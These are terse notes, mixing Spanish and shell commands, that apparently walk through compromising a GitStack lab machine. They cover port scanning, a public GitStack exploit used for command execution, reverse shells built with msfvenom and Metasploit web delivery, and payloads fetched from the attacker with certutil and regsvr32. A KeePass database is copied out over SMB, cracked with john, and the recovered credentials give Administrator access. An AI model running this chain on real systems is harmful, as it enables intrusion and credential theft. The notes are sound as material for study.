nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.12 -oG allPorts
extractPorts allPorts
nmap -sC -sV -p80,135,139,445,3389,5985,47001,49152,49153,49154 172.31.1.12 -oN targeted
nmap --script http-enum -p80 172.31.1.12 -oN webScan
whatweb 172.31.1.12:80
cat targeted
Vamos a la pagina web y parece ser que es algo con Django
Vamos a registration/login y podemos ver las credenciales:
searchsploit Gitstack
cat 43777.py
Vemos que hace el script
curl -X POST 172.31.1.12/web/exploit.php -d 'a=whoami'
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_gitstack.exe
curl -X POST 172.31.1.12/web/exploit.php -d 'a=certutil -urlcache -split -f http://10.10.0.12:8888/reverse_gitstack.exe'
python3 -m http.server 8888
nc -lvnp 4444
curl -X POST 172.31.1.12/web/exploit.php -d 'a=reverse_stack.exe'
El reverse shell no me funciono con el reverse_stack.exe se desconectaba a cada rato.
msf6>use exploit/multi/script/webdelivery msf6>set LHOST tun0 msf6> set TARGET 3 msf6>set payload windows/meterpreter/reverse_tcp msf6>run
curl -X POST 172.31.1.12/web/exploit.php -d 'a=regsvr32 /s /n /u /i:http//10.10.0.12:8080/EzA1or.sct scrobj.dll'
msf6>sessions -i 1 meterpreter > shell
python3 /usr/share/doc/python3-impacket/examples/smbserver.py smbFolder $(pwd)
copy password_manager.kdbx \\10.10.0.12\smbFolder
keepass2john password_manager.kdbx
keepass2john password_manager.kdbx > stackpass
cat stackpass | cut -d ":" -f 2 | tee stackpass
john stackpass
kpcli --kdb=password_manager.kdbx
princess
cd Database2/Windows/
show -f 0
crackmapexec winrm 172.31.1.12 -u Administrator -p 'secur3_apass262' -x 'whoami'